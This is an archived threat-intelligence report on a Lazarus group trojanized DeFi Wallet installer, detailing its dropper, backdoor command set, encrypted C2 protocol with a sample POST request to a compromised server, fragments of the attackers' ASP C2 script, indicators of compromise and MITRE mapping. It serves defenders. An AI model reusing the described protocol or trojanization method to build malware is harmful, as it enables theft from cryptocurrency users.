{ "id": "77d6e27b-e3cf-47e0-8cae-c5f03575079b", "created_at": "2026-04-06T00:08:57.062197Z", "updated_at": "2026-04-10T03:38:20.410151Z", "deleted_at": null, "sha1_hash": "1c210f2fdf044bbfba234e74a5c1f8561cfa2cba", "title": "Lazarus Trojanized DeFi app for delivering malware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 752472, "plain_text": "Lazarus Trojanized DeFi app for delivering malware\r\nBy GReAT\r\nPublished: 2022-03-31 · Archived: 2026-04-05 17:30:04 UTC\r\nFor the Lazarus threat actor, financial gain is one of the prime motivations, with a particular emphasis on the cryptocurrency\r\nbusiness. As the price of cryptocurrency surges, and the popularity of non-fungible token (NFT) and decentralized finance\r\n(DeFi) businesses continues to swell, the Lazarus group’s targeting of the financial industry keeps evolving.\r\nWe recently discovered a Trojanized DeFi application that was compiled in November 2021. This application contains a\r\nlegitimate program called DeFi Wallet that saves and manages a cryptocurrency wallet, but also implants a malicious file\r\nwhen executed. This malware is a full-featured backdoor containing sufficient capabilities to control the compromised\r\nvictim. After looking into the functionalities of this backdoor, we discovered numerous overlaps with other tools used by the\r\nLazarus group.\r\nThe malware operator exclusively used compromised web servers located in South Korea for this attack. To take over the\r\nservers, we worked closely with the KrCERT and, as a result of this effort, we had an opportunity to investigate a Lazarus\r\ngroup C2 server. The threat actor configured this infrastructure with servers set up as multiple stages. The first stage is the\r\nsource for the backdoor while the goal of the second stage servers is to communicate with the implants. This is a common\r\nscheme used in Lazarus infrastructure.\r\nBackground\r\nIn the middle of December 2021, we noticed a suspicious file uploaded to VirusTotal. At first glance, it looked like a\r\nlegitimate application related to decentralized finance (DeFi); however, looking closer we found it initiating an infection\r\nscheme. When executed, the app drops both a malicious file and an installer for a legitimate application, launching the\r\nmalware with the created Trojanized installer path. Then, the spawned malware overwrites the legitimate application with\r\nthe Trojanized application. Through this process, the Trojanized application gets removed from the disk, allowing it to cover\r\nits tracks.\r\nInfection timeline\r\nInitial infection\r\nWhile it’s still unclear how the threat actor tricked the victim into executing the Trojanized application\r\n(0b9f4612cdfe763b3d8c8a956157474a), we suspect they sent a spear-phishing email or contacted the victim through social\r\nmedia. The hitherto unknown infection procedure starts with the Trojanized application. This installation package is\r\ndisguised as a DeFi Wallet program containing a legitimate binary repackaged with the installer.\r\nUpon execution, it acquires the next stage malware path (C:\\ProgramData\\Microsoft\\GoogleChrome.exe) and decrypts it\r\nwith a one-byte XOR (Key: 0x5D). In the process of creating this next malware stage, the installer writes the first eight\r\nbytes including the ‘MZ’ header to the file GoogleChrome.exe and pushes the remaining 71,164 bytes from the data section\r\nof the Trojanized application. Next, the malware loads the resource CITRIX_MEETINGS from its body and saves it to the\r\nhttps://securelist.com/lazarus-trojanized-defi-app/106195/\r\nPage 1 of 8\n\npath C:\\ProgramData\\Microsoft\\CM202025.exe. The resulting file is a legitimate DeFi Wallet application. Eventually, it\r\nexecutes the previously created malware with its file name as a parameter:\r\nC:\\ProgramData\\Microsoft\\GoogleChrome.exe “[current file name]”\r\nMalware creation diagram\r\nBackdoor creation\r\nThe malware (d65509f10b432f9bbeacfc39a3506e23) generated by the above Trojanized application is disguised as a benign\r\ninstance of the Google Chrome browser. Upon launch, the malware checks if it was provided with one argument before\r\nattempting to copy the legitimate application “C:\\ProgramData\\Microsoft\\CM202025.exe” to the path given as the command\r\nline parameter, which means overwriting the original Trojanized installer, almost certainly in an attempt to conceal its prior\r\nexistence. Next, the malware executes the legitimate file to deceive the victim by showing its benign installation process.\r\nWhen the user executes the newly installed program, it shows the DeFi Wallet software built with the public source code[1].\r\nScreenshot of the manipulated application\r\nNext, the malware starts initializing the configuration information. The configuration shows the structure shown in the table\r\nbelow, consisting of flags, C2 server addresses, victim identification value, and time value. As the structure suggests, this\r\nmalware can hold up to five C2 addresses, but only three C2 servers are included in this case.\r\nhttps://securelist.com/lazarus-trojanized-defi-app/106195/\r\nPage 2 of 8\n\nOffset Length(bytes) Description\r\n0x00 4 Flag for starting C2 operation\r\n0x04 4 Random value to select C2 server\r\n0x08 4 Random value for victim identifier\r\n0x0C 0x208 C2 server address\r\n0x214 0x208 C2 server address\r\n0x41C 0x208 C2 server address\r\n0x624 0x208 C2 server address\r\n0x82C 0x208 C2 server address\r\n0xA34 0x464 Buffer for system information\r\n0xE98 0x400 Full cmd.exe path\r\n0x1298 0x400 Temporary folder path\r\n0x1698 8 Time to start backdoor operation\r\n0x16A0 4 Time interval\r\n0x16A4 4 Flag for gathering logical drives\r\n0x16A8 8 Flag for enumerating session information\r\n0x16B0 8 The time value for gathering logical drive and session information\r\nThe malware randomly chooses a C2 server address and sends a beacon signal to it. This signal is a hard-coded\r\n‘0x60D49D94’ DWORD without encryption; the response data returned from the C2 carries the same value. If the expected\r\nvalue from the C2 server is received, the malware starts its backdoor operation.\r\nFollowing further communication with the C2, the malware encrypts data by a predefined method. The encryption is done\r\nvia RC4 and the hard-coded key 0xD5A3 before additionally being encoded with base64.\r\nThe malware generates POST parameters with hard-coded names. The request type (msgID), victim identification value, and\r\na randomly generated value are merged into the ‘jsessid’ parameter. It also uses the ‘cookie’ parameter to store four\r\nrandomly generated four-byte values. These values are again encrypted with RC4 and additionally base64 encoded. Based\r\non our investigation of the C2 script, we observed this malware not only uses a parameter named ‘jsessid’, but also ‘jcookie’\r\nas well.\r\nStructure of ‘jsessid’ parameter\r\nThe following HTTP request shows the malware attempting to connect to the C2 with the request type ’60d49d98′ and a\r\nrandomly generated cookie value.\r\nPOST /include/inc.asp HTTP/1.1\r\nhttps://securelist.com/lazarus-trojanized-defi-app/106195/\r\nPage 3 of 8\n\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR\r\n2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\r\nHost: emsystec.com\r\nContent-Length: 80\r\nCache-Control: no-cache\r\njsessid=60d49d980163be8f00019f91\u0026cookie=29f23f917ab01aa8lJ3UYA==2517757b7dfb47f1\r\nDepending on the response from the C2, the malware performs its instructed backdoor task. It carries various functionalities\r\nto gather system information and control the victim machine.\r\nCommand Description\r\n0x60D49D97 Set time configuration with the current time interval (default is 10) value\r\n0x60D49D9F Set time configuration with delivered data from C2 server\r\n0x60D49DA0 Gather system information, such as IP address, computer name, OS version, CPU architecture\r\n0x60D49DA1 Collect drive information including type and free size\r\n0x60D49DA2 Enumerate files (with file name, size, time)\r\n0x60D49DA3 Enumerate processes\r\n0x60D49DA4 Terminate process\r\n0x60D49DA5 Change working directory\r\n0x60D49DA6 Connect to a given IP address\r\n0x60D49DA7 File timestamping\r\n0x60D49DA8 Execute Windows command\r\n0x60D49DA9 Securely delete a file\r\n0x60D49DAA Spawn process with CreateProcessW API\r\n0x60D49DAB Spawn process with CreateProcessAsUserW API\r\n0x60D49DAC Spawn process with high integrity level\r\n0x60D49DAD Download file from C2 server and save to given file path\r\n0x60D49DAE Send file creation time and contents\r\n0x60D49DAF Add files to .cab file and send it to the C2 server\r\n0x60D49DB0 Collect a list of files at the given path\r\n0x60D49DB1 Send the configuration to the C2 server\r\n0x60D49DB2 Receive new configuration from the C2 server\r\n0x60D49DB3 Set config to the current time\r\n0x60D49DB4 Sleep 0.1 seconds and continue\r\nInfrastructure\r\nhttps://securelist.com/lazarus-trojanized-defi-app/106195/\r\nPage 4 of 8\n\nLazarus only used compromised web servers located in South Korea in this campaign. As a result of working closely with\r\nthe KrCERT in taking down some of them, we had a chance to look into the corresponding C2 script from one of the\r\ncompromised servers. The script described in this section was discovered in the following path:\r\nhttp://bn-cosmo[.]com/customer/board_replay[.]asp\r\nThe script is a VBScript.Encode ASP file, commonly used by the Lazarus group in their C2 scripts. After decoding, it shows\r\nthe string ’60d49d95′ as an error response code, whereas the string ’60d49d94′ is used as a success message. In addition, the\r\nconnection history is saved to the file ‘stlogo.jpg‘ and the C2 address for the next stage is stored in the file ‘globals.jpg‘\r\nlocated in the same folder.\r\nConfiguration of C2 script\r\nThis script checks what value is delivered in the ‘jcookie’ parameter and, if it’s longer than 24 characters, it extracts the first\r\neight characters as msgID. Depending on the msgID value, it calls different functions. The backdoor command and\r\ncommand execution result delivered by the backdoor get stored to global variables. We have seen this scheme in operation\r\nbefore with the Bookcode[2] cluster. This script uses the following variables as flags and buffers to deliver data and\r\ncommands between the backdoor and a second stage C2 server:\r\nlFlag: flag to signal that there is data to deliver to the backdoor\r\nlBuffer: buffer to store data to be later sent to the backdoor\r\ntFlag: flag to signal that there is a response from the backdoor\r\ntBuffer: buffer to store incoming data from the backdoor\r\nmsgID\r\nFunction\r\nname\r\nDescription\r\n60d49d98 TFConnect\r\nSave the ‘TID’ value (victim identifier) to the log file, send ‘jcookie’ value with the\r\nclient’s IP address after acquiring the next stage C2 address from the config file\r\n(globals.jpg). Forward the response from the next stage server to the client.\r\n60d49d99 TConnect\r\nDeliver the command to the backdoor:\r\nIf the lFlag is ‘true’, send lBuffer to the client. Reset ‘lBuffer’ and set lFlag to ‘false’.\r\nOtherwise, reset ‘tBuffer’ and set tFlag to ‘false’.\r\n60d49d9a LConnect\r\nSend the command and return the command execution result:\r\nSet ‘lBuffer’ value to ‘jcookie’ parameter, delivering ‘tBuffer’ to the client.\r\n60d49d9c Check\r\nRetrieve host information (computer name, OS version). Delete the configuration file,\r\nwhich saves the C2’s next stage address, if it exists. Then save the new configuration with\r\ndelivered data through the ‘jcookie’ parameter.\r\n60d49d9d LogDown Deliver log file after base64 encoding and then delete it.\r\nthe others N/A\r\nWrite connections with unknown/unexpected msgID (request type) data to a log file,\r\nentries are tagged with ‘xxxxxxxx’.\r\nAttribution\r\nhttps://securelist.com/lazarus-trojanized-defi-app/106195/\r\nPage 5 of 8\n\nWe believe with high confidence that the Lazarus group is linked to this malware as we identified similar malware in the\r\nCookieTime cluster. The CookieTime cluster, called LCPDot by JPCERT, was a malware cluster that was heavily used by\r\nthe Lazarus group until recently. We’ve seen Lazarus group target the defence industry using the CookieTime cluster with a\r\njob opportunity decoy. We have already published several reports about this cluster to our Threat Intelligence Service\r\ncustomers, and we identified a Trojanized Citrix application (5b831eaed711d5c4bc19d7e75fcaf46e) with the same code\r\nsignature as the CookieTime malware. The backdoor discovered in the latest investigation, and the previously discovered\r\nTrojanized application, are almost identical. They share, among other things, the same C2 communication method, backdoor\r\nfunctionalities, random number generation routine and the same method to encrypt communication data. Also, this malware\r\nwas mentioned in an article by Ahnlab discussing connections with the CookieTime (aka LCPDot) malware.\r\nSame backdoor switch of old CookieTime malware\r\nIn turn, we identified that the CookieTime cluster has ties with the Manuscrypt and ThreatNeedle clusters, which are also\r\nattributed to the Lazarus group. This doesn’t only apply to the backdoor itself, but also to the C2 scripts, which show several\r\noverlaps with the ThreatNeedle cluster. We discovered almost all function and variable names, which means the operators\r\nrecycled the code base and generated corresponding C2 scripts for the malware.\r\nThreatNeedle C2 script from\r\nroit.co[.]kr/xyz/adminer/edit_fail_decoded.asp\r\nC2 script of this case\r\nfunctIon getIpAddress()\r\nOn ErroR resume next\r\nDim ip\r\nip=Request.SErVervariables(\"HTTP_CLIENT_IP\")\r\nIf ip=\"\"THen\r\nIp=ReQUest.ServervaRiAbLes(\"HTTP_X_FORWARDED_FOR\")\r\nIf ip=\"\"ThEn\r\nip=request.ServerVaRiables(\"REMOTE_ADDR\")\r\nEnd If\r\nEnd if\r\nGEtIpAdDress=ip\r\nEnd FuNction\r\n \r\nfUnctioN GetIpAddress()\r\nON Error Resume Next\r\nDim iP   \r\nip=ReqUest.ServerVaRiables(\"HTTP_CLIENT_IP\")\r\nIf ip=\"\"THEn\r\niP=Request.SErverVariaBleS(\"HTTP_X_FORWARDED\r\nIf ip=\"\"then\r\nip=reQuest.ServErVariables(\"REMOTE_ADDR\")\r\nEnD IF\r\nEnD If\r\nGEtipAddreSs=ip\r\nEnd FUnction\r\n \r\nAlmost identical scripts to fetch IP address of client\r\nhttps://securelist.com/lazarus-trojanized-defi-app/106195/\r\nPage 6 of 8\n\nThreatNeedle C2 script from:\r\nedujikim[.]com/pay_sample/INIstart.asp\r\nC2 script of this case\r\nSub writeDataToFile(strFileName, byData)\r\nDim objFSO, objFile, strFilePath\r\nConst ForAppending = 8\r\nstrFilePath = Server.MapPath(\".\") \u0026 \"\\\" \u0026\r\nstrFileName\r\nSet objFSO =\r\nCreateObject(\"Scripting.FileSystemObject\")\r\nSet objFile =\r\nobjFSO.OpenTextFile(strFilePath,\r\nForAppending, True)\r\nobjFile.Write byData\r\nobjFile.Close\r\nEnd Sub\r\n \r\nSub WritedatA(filepath,byData)\r\ndim objFSO,oBJFile\r\nConSt ForAppEnDing=8\r\nSet\r\nobjFsO=CreateObject(\"Scripting.FileSystemObject\")\r\nSeT\r\nobjFIle=objFso.OpENTextFile(filepaTh,FoRAppending,True)\r\nobjFilE.Write ByDatA\r\nobjFIle.CLose\r\nEnD Sub\r\n \r\nSimilar scripts to save data to a file\r\nConclusions\r\nIn a previous investigation we discovered that the BlueNoroff group, which is also linked to Lazarus, compromised another\r\nDeFi wallet program called MetaMask. As we can see in the latest case, the Lazarus and BlueNoroff groups attempt to\r\ndeliver their malware without drawing attention to it and have evolved sophisticated methods to lure their victims. The\r\ncryptocurrency and blockchain-based industry continues to grow and attract high levels of investment. For this reason, we\r\nstrongly believe Lazarus’s interest in this industry as a major source of financial gain will not diminish any time soon.\r\nIndicators of Compromise\r\nTrojanized DeFi application\r\n0b9f4612cdfe763b3d8c8a956157474a    DeFi-App.exe\r\nDropped backdoor\r\nd65509f10b432f9bbeacfc39a3506e23    %ProgramData%\\Microsoft\\GoogleChrome.exe\r\nSimilar backdoor\r\na4873ef95e6d76856aa9a43d56f639a4\r\nd35a9babbd9589694deb4e87db222606\r\n70bcafbb1939e45b841e68576a320603\r\n3f4cf1a8a16e48a866aebd5697ec107b\r\nb7092df99ece1cdb458259e0408983c7\r\n8e302b5747ff1dcad301c136e9acb4b0\r\nd90d267f81f108a89ad728b7ece38e70\r\n47b73a47e26ba18f0dba217cb47c1e16\r\n77ff51bfce3f018821e343c04c698c0e\r\nhttps://securelist.com/lazarus-trojanized-defi-app/106195/\r\nPage 7 of 8\n\nFirst stage C2 servers (Legitimate, compromised)\r\nhxxp://emsystec[.]com/include/inc[.]asp\r\nhxxp://www[.]gyro3d[.]com/common/faq[.]asp\r\nhxxp://www[.]newbusantour[.]co[.]kr/gallery/left[.]asp\r\nhxxp://ilovesvc[.]com/HomePage1/Inquiry/privacy[.]asp\r\nhxxp://www[.]syadplus[.]com/search/search_00[.]asp\r\nhxxp://bn-cosmo[.]com/customer/board_replay[.]asp\r\nSecond stage C2 servers (Legitimate, compromised)\r\nhxxp://softapp[.]co[.]kr/sub/cscenter/privacy[.]asp\r\nhxxp://gyro3d[.]com/mypage/faq[.]asp\r\nMITRE ATT\u0026CK Mapping\r\nThis table contains all the TTPs identified in the analysis of the activity described in this report.\r\nTactic Technique Technique Name\r\nExecution T1204.002\r\nUser Execution: Malicious File\r\nUse Trojanized application to drop malicious backdoor\r\nPersistence T1547.001\r\nBoot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nRegister dropped backdoor to the Run registry key\r\nDefense Evasion\r\nT1070.004\r\nIndicator Removal on Host: File Deletion\r\nThe Trojanized application overwrites itself after creating a legitimate\r\napplication to remove its trace\r\nT1070.006\r\nIndicator Removal on Host: Timestomp\r\nBackdoor capable of timestomping specific files\r\nDiscovery\r\nT1057\r\nProcess Discovery\r\nList running processes with backdoor\r\nT1082\r\nSystem Information Discovery\r\nGather IP address, computer name, OS version, and CPU architecture with\r\nbackdoor\r\nT1083\r\nFile and Directory Discovery\r\nList files in some directories with backdoor\r\nT1124\r\nSystem Time Discovery\r\nGather system information with backdoor\r\nCommand and\r\nControl\r\nT1071.001\r\nApplication Layer Protocol: Web Protocols\r\nUse HTTP as C2 channel with backdoor\r\nT1573.001\r\nEncrypted Channel: Symmetric Cryptography\r\nUse RC4 encryption and base64 with backdoor\r\nExfiltration T1041\r\nExfiltration Over C2 Channel\r\nExfiltrates gathered data over C2 channels with backdoor\r\n[1]\r\n https://github.com/DeFiCh/app\r\n[2]\r\n APT Intel report: Lazarus Covet Covid19 Related Intelligence\r\nSource: https://securelist.com/lazarus-trojanized-defi-app/106195/\r\nhttps://securelist.com/lazarus-trojanized-defi-app/106195/\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://securelist.com/lazarus-trojanized-defi-app/106195/" ], "report_names": [ "106195" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0", "created_at": "2022-10-25T15:50:23.240383Z", "updated_at": "2026-04-10T02:00:05.299433Z", "deleted_at": null, "main_name": "APT38", "aliases": [ "APT38", "NICKEL GLADSTONE", "BeagleBoyz", "Bluenoroff", "Stardust Chollima", "Sapphire Sleet", "COPERNICIUM" ], "source_name": "MITRE:APT38", "tools": [ "ECCENTRICBANDWAGON", "HOPLIGHT", "Mimikatz", "KillDisk", "DarkComet" ], "source_id": "MITRE", "reports": null }, { "id": "1bdb91cf-f1a6-4bed-8cfa-c7ea1b635ebd", "created_at": "2022-10-25T16:07:23.766784Z", "updated_at": "2026-04-10T02:00:04.7432Z", "deleted_at": null, "main_name": "Bluenoroff", "aliases": [ "APT 38", "ATK 117", "Alluring Pisces", "Black Alicanto", "Bluenoroff", "CTG-6459", "Copernicium", "G0082", "Nickel Gladstone", "Sapphire Sleet", "Selective Pisces", "Stardust Chollima", "T-APT-15", "TA444", "TAG-71", "TEMP.Hermit" ], "source_name": "ETDA:Bluenoroff", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434137, "ts_updated_at": 1775792300, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/1c210f2fdf044bbfba234e74a5c1f8561cfa2cba.pdf", "text": "https://archive.orkl.eu/1c210f2fdf044bbfba234e74a5c1f8561cfa2cba.txt", "img": "https://archive.orkl.eu/1c210f2fdf044bbfba234e74a5c1f8561cfa2cba.jpg" } }